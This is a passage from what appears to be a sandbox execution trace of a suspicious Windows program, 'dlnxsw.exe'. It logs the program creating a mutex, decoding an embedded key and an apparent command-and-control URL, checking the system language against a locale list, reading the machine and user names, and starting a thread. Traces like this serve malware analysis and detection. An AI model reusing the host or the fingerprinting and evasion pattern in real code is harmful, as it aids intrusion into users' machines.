B6915299FC4\r\n4E51044A586F1142749D410D34F835E65EDF8B848CE203644C9138F3B234FBC2\r\nB8B06712DCCB731525CDF08B5A6852FFC17698293F064174DE37FFD6491B9EBC\r\nEC900D56F287E387B7098A1E96F82472AE43238B7D5BE06F5B395DDB86BD5DBE\r\n5B566357792A4833047C80ADE48FCD9ABAD005B5BCC6EEF9A1DFAC444DCEA5E8\r\n56E3009F971B9E17DAB34DAC4AC2390236B1A7DD40B00FAF3D9990501E00B637\r\n8EA6B6E49C8FA9764D2AEDB46B7F18A4F38DF120B52BB814BA0EF70FD31AA409\r\n9\r\n01F222\r\nE807537BE6EECE1F6FBF6FCCCA\r\n8F9FDA106055FCBB3014C8A7C91A4EF98D8A7134E73F666BF4A2C850868D5CA6E4307DBDED772F5281B9577D4AC235D34C381D1C49EBB71CD90EE9375E4B43A29F446838B05435548A6C3FB5364D745137D558BC0F836FF4BCD848401F9AD59318AE68BCD33BB725AB0D24EFFED26CDE41AF5274F877\r\n2D7056382C246DA0A2C617766DD5D48126190386CEADFF8E0E8AE35A601AAD54BA36F4459725979BFD3FFC6192125F8ABCA53E02F5D1F7DFDFD5D2334AD08890999CE62C7EAA4010E7E70B4A430088CFA7B41235FD931645C8DB062AD749A90F8A86CE5A962E8175860D2AC6B5B1A21D79EE9C1912283811DED02E8821B24A1589CA20295CEE5869306A74750E297649\r\n3F6A74C7\r\nB4BEC4DEF0C2CE83EE1F\r\nC7809872884CEB2D42AD3B12\r\n27\r\nCC8284279D97E2836CAD425DFB4E9E451973F4192254FB\r\n6F7AD16394393D8324423B35DAA81B8958E7\r\n77E794158170493B6DB137D2C28FC340132A040EAF58EE\r\n703589700A\r\nC4EE8529B4D2F186315F750DF8\r\n8C\r\nE0\r\nAD\r\nFBA8368406D7826C44C72BD20BF672943CE02CE76D55650470939D2DF9D4432D162BF1A416D0D633249F6EC3B5B725428337675765FFF945A5816B4D784B1C038E7468782684852FD2115334F7E8637BA87E3E1480B0942EAF73635222552D53F987192FD50BD1E0DC1E212680B2E72D6CF0912E75CFB25C750A0C78B538A3A9EC1529D37C06316483943ED1C87C77F6F5FA7A61E590D158AAB074E515107439B42AB7B3EF1565B5EA9B818962E4667699163921CB78D620B97D5865BDC3429A9557EC3AE8172B6EE43C49CD805E2CA639C7C552AE52352664A6731FB80B8BA3F656D03A\r\n1EE0DEC8CAD81CDB53485920B04229FBA91F373109E21F48A1BDA58C20AD8AEE245AF662AC8D49CFF55E\r\n84\r\n6A\r\n30889E9D05B5C2F86C2205\r\n08C89C530D8888A8EBAEAD5C34F3172C5D35E6C1DB69E01AF14D19A95BCA66\r\n93F292286A23AC41ADADB2742B7DCB2E430B\r\nA62FCD543B5F3E1AD7CB53F44BF280EF19AE06C351030DDDAE4B7826DEE5\r\nA8997740DB559B823417ED86FE\r\nC79DE27A03AE46C9191F145FD2A1\r\n608304BDAE9F2E3DDA68BBFD79\r\nB4E3A9897B5F9156DEAD40EC5743B2F8D0CC3B1B80EADDE538B2B65EF7F5D74DE86B31DF139602D1D98726E2F962C1BDF13F909ECA2DFF282C31188FCCE2580C0552E198CD534FD5B185A50F25D5EDB40206BA902A7E1A89F94A3FA60C2D35F57EA871C4AB2E5435CD36F6324CB4C0664C452BC292CAFE2880C55267C9C09C81B9BC\r\n9DAFB755BE4F29CB422C52\r\n03029D342AB446EBF0A8942AA7D72577986C7B2D5B\r\nE8B67ECFAF1B6409461D8E76\r\n") returned 5829 [0050.677] FreeResource (hResData=0x4f7718) returned 0 [0050.677] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1f79eec, cbMultiByte=1, lpWideCharStr=0x18eafc, cchWideChar=2047 | out: lpWideCharStr="1<P\x18") returned 1 [0050.677] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1f79eec, cbMultiByte=1, lpWideCharStr=0x18eafc, cchWideChar=2047 | out: lpWideCharStr="1<L\x18") returned 1 [0050.677] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1f79eec, cbMultiByte=1, lpWideCharStr=0x18eafc, cchWideChar=2047 | out: lpWideCharStr="1<H\x18") returned 1 [0050.677] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1f79eec, cbMultiByte=1, lpWideCharStr=0x18eafc, cchWideChar=2047 | out: lpWideCharStr="1<D\x18") returned 1 [0050.677] GetTickCount () returned 0x1147041 [0050.677] QueryPerformanceCounter (in: lpPerformanceCount=0x18fb9c | out: lpPerformanceCount=0x18fb9c*=17101636072) returned 1 [0050.678] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb78, cbMultiByte=1, lpWideCharStr=0x18eb60, cchWideChar=2047 | out: lpWideCharStr="g矍ﮘ\x18\x18\x18ọ矋岲\x13￾￿X矇ﴏ矆\x02") returned 1 [0050.678] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb78, cbMultiByte=1, lpWideCharStr=0x18eb60, cchWideChar=2047 | out: lpWideCharStr="h矍ﮘ\x18\x18\x18ọ矋岲\x13￾￿X矇ﴏ矆\x02") returned 1 [0050.678] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb78, cbMultiByte=1, lpWideCharStr=0x18eb60, cchWideChar=2047 | out: lpWideCharStr="u矍ﮘ\x18\x18\x18ọ矋岲\x13￾￿X矇ﴏ矆\x02") returned 1 [0050.678] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb78, cbMultiByte=1, lpWideCharStr=0x18eb60, cchWideChar=2047 | out: lpWideCharStr="l矍ﮘ\x18\x18\x18ọ矋岲\x13￾￿X矇ﴏ矆\x02") returned 1 [0050.678] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb78, cbMultiByte=1, lpWideCharStr=0x18eb60, cchWideChar=2047 | out: lpWideCharStr="h矍ﮘ\x18\x18\x18ọ矋岲\x13￾￿X矇ﴏ矆\x02") returned 1 [0050.678] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb78, cbMultiByte=1, lpWideCharStr=0x18eb60, cchWideChar=2047 | out: lpWideCharStr="m矍ﮘ\x18\x18\x18ọ矋岲\x13￾￿X矇ﴏ矆\x02") returned 1 [0050.678] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb78, cbMultiByte=1, lpWideCharStr=0x18eb60, cchWideChar=2047 | out: lpWideCharStr="C矍ﮘ\x18\x18\x18ọ矋岲\x13￾￿X矇ﴏ矆\x02") returned 1 [0050.678] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb78, cbMultiByte=1, lpWideCharStr=0x18eb60, cchWideChar=2047 | out: lpWideCharStr="7矍ﮘ\x18\x18\x18ọ矋岲\x13￾￿X矇ﴏ矆\x02") returned 1 [0050.678] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb78, cbMultiByte=1, lpWideCharStr=0x18eb60, cchWideChar=2047 | out: lpWideCharStr="q矍ﮘ\x18\x18\x18ọ矋岲\x13￾￿X矇ﴏ矆\x02") returned 1 [0050.678] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb78, cbMultiByte=1, lpWideCharStr=0x18eb60, cchWideChar=2047 | out: lpWideCharStr="c矍ﮘ\x18\x18\x18ọ矋岲\x13￾￿X矇ﴏ矆\x02") returned 1 [0050.678] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb78, cbMultiByte=1, lpWideCharStr=0x18eb60, cchWideChar=2047 | out: lpWideCharStr="I矍ﮘ\x18\x18\x18ọ矋岲\x13￾￿X矇ﴏ矆\x02") returned 1 [0050.678] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb78, cbMultiByte=1, lpWideCharStr=0x18eb60, cchWideChar=2047 | out: lpWideCharStr="Y矍ﮘ\x18\x18\x18ọ矋岲\x13￾￿X矇ﴏ矆\x02") returned 1 [0050.678] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb78, cbMultiByte=1, lpWideCharStr=0x18eb60, cchWideChar=2047 | out: lpWideCharStr="Y矍ﮘ\x18\x18\x18ọ矋岲\x13￾￿X矇ﴏ矆\x02") returned 1 [0050.678] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb78, cbMultiByte=1, lpWideCharStr=0x18eb60, cchWideChar=2047 | out: lpWideCharStr="U矍ﮘ\x18\x18\x18ọ矋岲\x13￾￿X矇ﴏ矆\x02") returned 1 [0050.679] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb78, cbMultiByte=1, lpWideCharStr=0x18eb60, cchWideChar=2047 | out: lpWideCharStr="u矍ﮘ\x18\x18\x18ọ矋岲\x13￾￿X矇ﴏ矆\x02") returned 1 [0050.679] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb78, cbMultiByte=1, lpWideCharStr=0x18eb60, cchWideChar=2047 | out: lpWideCharStr="R矍ﮘ\x18\x18\x18ọ矋岲\x13￾￿X矇ﴏ矆\x02") returned 1 [0050.679] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.exe\" " [0050.679] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1f72acc, cbMultiByte=13, lpWideCharStr=0x18eaf0, cchWideChar=2047 | out: lpWideCharStr="muteBG85muuut\x18륰@Ӥ") returned 13 [0050.679] OpenMutexW (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="muteBG85muuut") returned 0x0 [0050.679] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="muteBG85muuut") returned 0xe4 [0050.679] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.exe\" " [0050.679] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.exe\" " [0050.679] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.exe\" " [0050.679] FindResourceW (hModule=0x400000, lpName="LCWL", lpType=0xa) returned 0x4f5460 [0050.679] LoadResource (hModule=0x400000, hResInfo=0x4f5460) returned 0x526380 [0050.679] SizeofResource (hModule=0x400000, hResInfo=0x4f5460) returned 0x60 [0050.679] LockResource (hResData=0x526380) returned 0x526380 [0050.679] FreeResource (hResData=0x526380) returned 0 [0050.679] FindResourceW (hModule=0x400000, lpName="KN", lpType=0xa) returned 0x4f5450 [0050.680] LoadResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x526358 [0050.680] SizeofResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x26 [0050.680] LockResource (hResData=0x526358) returned 0x526358 [0050.680] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fa4f60, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0050.680] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fa4f60, cbMultiByte=38, lpWideCharStr=0x1f9e26c, cchWideChar=38 | out: lpWideCharStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr\r\n42\r\n") returned 38 [0050.680] FreeResource (hResData=0x526358) returned 0 [0050.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0050.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr", cchWideChar=32, lpMultiByteStr=0x1fa4f64, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr", lpUsedDefaultChar=0x0) returned 32 [0050.680] GetCurrentThreadId () returned 0xa68 [0050.680] GetCurrentThreadId () returned 0xa68 [0050.680] GetCurrentThreadId () returned 0xa68 [0050.680] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1f55ac8, cbMultiByte=96, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0050.680] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1f55ac8, cbMultiByte=96, lpWideCharStr=0x1f6d3ac, cchWideChar=96 | out: lpWideCharStr="1049\r\n2072\r\n2073\r\n2115\r\n1091\r\n1058\r\n1090\r\n1092\r\n1064\r\n1059\r\n1067\r\n1079\r\n1087\r\n1088\r\n1062\r\n1063\r\n") returned 96 [0050.680] GetSystemDefaultLCID () returned 0x409 [0050.681] GetUserDefaultLCID () returned 0x409 [0050.681] GetSystemDefaultLangID () returned 0x680409 [0050.681] GetUserDefaultLangID () returned 0x409 [0050.681] GetSystemDefaultUILanguage () returned 0x409 [0050.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1049", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2072", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2073", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2115", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1091", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1058", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1090", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1092", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1064", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1059", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1067", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1079", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1087", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1088", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1062", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1063", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1049", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2072", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2073", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2115", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1091", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1058", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1090", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1092", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1064", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1059", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1067", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1079", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1087", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1088", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1062", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1063", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1049", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2072", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2073", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2115", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1091", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1058", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1090", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1092", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1064", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1059", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1067", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1079", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1087", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1088", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1062", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1063", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1049", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2072", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2073", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2115", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1091", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1058", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1090", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1092", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1064", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1059", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1067", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1079", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1087", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1088", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1062", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1063", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1049", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2072", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2073", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2115", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1091", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1058", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1090", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1092", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1064", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1059", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1067", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1079", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1087", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1088", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1062", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1063", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0050.685] GetCurrentThreadId () returned 0xa68 [0050.685] GetCurrentThreadId () returned 0xa68 [0050.685] GetCurrentThreadId () returned 0xa68 [0050.685] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.exe\" " [0050.685] ExpandEnvironmentStringsW (in: lpSrc="%COMPUTERNAME%", lpDst=0x1f1484c, nSize=0x8000 | out: lpDst="XDUWTFONO") returned 0xa [0050.685] ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x1f1484c, nSize=0x8000 | out: lpDst="5p5NrGJn0jS HALPmcxz") returned 0x15 [0050.685] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1f72a8c, cbMultiByte=12, lpWideCharStr=0x18eaec, cchWideChar=2047 | out: lpWideCharStr="bg85_api_keyuut\x18륰@Ӥ") returned 12 [0050.685] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1f8862c, cbMultiByte=21, lpWideCharStr=0x18eae8, cchWideChar=2047 | out: lpWideCharStr="http://sec.timerz.org") returned 21 [0050.685] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x407a44, lpParameter=0x1f80df0, dwCreationFlags=0x4, lpThreadId=0x1f9e1a4 | out: lpThreadId=0x1f9e1a4*=0x9d4) returned 0xe8 [0050.686] SetThreadPriority (hThread=0xe8, nPriority=0) returned 1 [0050.686] ResumeThread (hThread=0xe8) returned 0x1 [0050.686] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.exe\" " [0050.686] LoadStringW (in: hInstance=0x400000, uID=0xff67, lpBuffer=0x18db38, cchBufferMax=4096 | out: lpBuffer="64-bit Edition") returned 0xe [0050.686] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x18db34, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0050.687] LoadStringW (in: hInstance=0x400000, uID=0xff67, lpBuffer=0x18db38, cchBufferMax=4096 | out: lpBuffer="64-bit Edition") returned 0xe [0050.687] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x18db34, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0050.687] GetCurrentThread () returned 0xfffffffe [0050.687] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x18fbc8 | out: TokenHandle=0x18fbc8*=0x0) returned 0 [0050.687] GetLastError () returned 0x3f0 [0050.687] GetCurrentProcess () returned 0xffffffff [0050.687] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18fbc8 | out: TokenHandle=0x18fbc8*=0xec) returned 1 [0050.687] GetTokenInformation (in: TokenHandle=0xec, TokenInformationClass=0x2, TokenInformation=0x1f6b370, TokenInformationLength=0x400, ReturnLength=0x18fbc4 | out: TokenInformation=0x1f6b370, ReturnLength=0x18fbc4) returned 1 [0050.687] CloseHandle (hObject=0xec) returned 1 [0050.687] AllocateAndInitializeSid (in: pIdentifierAuthority=0x4e7754, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x18fbc0 | out: pSid=0x18fbc0*=0x681850*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0050.687] EqualSid (pSid1=0x681850*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x1f6b3d4*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25))) returned 0 [0050.687] EqualSid (pSid1=0x681850*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x1f6b3f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, 